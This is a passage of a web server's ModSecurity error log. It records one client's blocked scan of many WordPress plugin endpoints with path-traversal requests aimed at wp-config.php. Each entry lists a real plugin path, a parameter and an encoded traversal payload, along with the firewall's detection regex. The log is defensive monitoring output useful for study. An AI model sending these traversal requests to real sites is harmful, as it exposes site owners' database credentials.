2022] [:error] [pid 22470:tid 140017007523584] [client 72.11.157.116:51482] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/zoomabletreemap.php"] [unique_id "YtscZnxqqtgWgIAXsGFheAAAABA"] [Fri Jul 22 16:53:42.249420 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51484] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"] [unique_id "YtscZnhurfgLch3PImzH_wAAAME"] [Fri Jul 22 16:53:42.339054 2022] [:error] [pid 22472:tid 140017116628736] [client 72.11.157.116:51486] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thinkun-remind/exportData.php"] [unique_id "YtscZipbG8_UBGXeM63wugAAAIM"] [Fri Jul 22 16:53:42.456462 2022] [:error] [pid 22472:tid 140017099843328] [client 72.11.157.116:51488] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "YtscZipbG8_UBGXeM63wuwAAAIU"] [Fri Jul 22 16:53:42.560215 2022] [:error] [pid 22472:tid 140017133414144] [client 72.11.157.116:51490] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "YtscZipbG8_UBGXeM63wvAAAAIE"] [Fri Jul 22 16:53:42.650068 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:51492] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php"] [unique_id "YtscZipbG8_UBGXeM63wvQAAAJU"] [Fri Jul 22 16:53:42.748210 2022] [:error] [pid 22472:tid 140017007523584] [client 72.11.157.116:51494] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "YtscZipbG8_UBGXeM63wvgAAAJA"] [Fri Jul 22 16:53:42.838189 2022] [:error] [pid 22472:tid 140017141806848] [client 72.11.157.116:51496] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordtube/wordtube-button.php"] [unique_id "YtscZipbG8_UBGXeM63wvwAAAIA"] [Fri Jul 22 16:53:42.964375 2022] [:error] [pid 22472:tid 140017049487104] [client 72.11.157.116:51498] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "YtscZipbG8_UBGXeM63wwAAAAIs"] [Fri Jul 22 16:53:43.059181 2022] [:error] [pid 22472:tid 140016940381952] [client 72.11.157.116:51500] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "YtscZypbG8_UBGXeM63wwQAAAJg"] [Fri Jul 22 16:53:43.149546 2022] [:error] [pid 22472:tid 140017083057920] [client 72.11.157.116:51502] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "YtscZypbG8_UBGXeM63wwgAAAIc"] [Fri Jul 22 16:53:43.254126 2022] [:error] [pid 22472:tid 140017015916288] [client 72.11.157.116:51504] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-imagezoom/download.php"] [unique_id "YtscZypbG8_UBGXeM63wwwAAAI8"] [Fri Jul 22 16:53:43.357336 2022] [:error] [pid 22470:tid 140016965560064] [client 72.11.157.116:51506] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-lytebox/main.php"] [unique_id "YtscZ3xqqtgWgIAXsGFheQAAABU"] [Fri Jul 22 16:53:43.454084 2022] [:error] [pid 23081:tid 140017074665216] [client 72.11.157.116:51510] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "YtscZ3hurfgLch3PImzIAAAAAMg"] [Fri Jul 22 16:53:43.545838 2022] [:error] [pid 22472:tid 140017066272512] [client 72.11.157.116:51512] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-mon/assets/download.php"] [unique_id "YtscZypbG8_UBGXeM63wxAAAAIk"] [Fri Jul 22 16:53:43.647122 2022] [:error] [pid 22470:tid 140017125021440] [client 72.11.157.116:51516] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-publication-archive/includes/openfile.php"] [unique_id "YtscZ3xqqtgWgIAXsGFhegAAAAI"] [Fri Jul 22 16:53:43.736834 2022] [:error] [pid 22470:tid 140017108236032] [client 72.11.157.116:51518] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "YtscZ3xqqtgWgIAXsGFhewAAAAQ"] [Fri Jul 22 16:53:43.826593 2022] [:error] [pid 22470:tid 140017099843328] [client 72.11.157.116:51520] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "YtscZ3xqqtgWgIAXsGFhfAAAAAU"] [Fri Jul 22 16:53:43.916086 2022] [:error] [pid 22471:tid 140017091450624] [client 72.11.157.116:51522] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-table/js/wptable-button.phpp"] [unique_id "YtscZ-CtYZwatdwcM8Wq0gAAAEY"] [Fri Jul 22 16:53:44.005730 2022] [:error] [pid 22472:tid 140017032701696] [client 72.11.157.116:51524] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"] [unique_id "YtscaCpbG8_UBGXeM63wxQAAAI0"] [Fri Jul 22 16:53:44.095250 2022] [:error] [pid 23081:tid 140016999130880] [client 72.11.157.116:51526] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpeasystats/export.php"] [unique_id "YtscaHhurfgLch3PImzIAQAAANE"] [Fri Jul 22 16:53:44.184873 2022] [:error] [pid 22472:tid 140017057879808] [client 72.11.157.116:51528] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "YtscaCpbG8_UBGXeM63wxgAAAIo"] [Fri Jul 22 16:53:44.279428 2022] [:error] [pid 23081:tid 140017108236032] [client 72.11.157.116:51530] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match 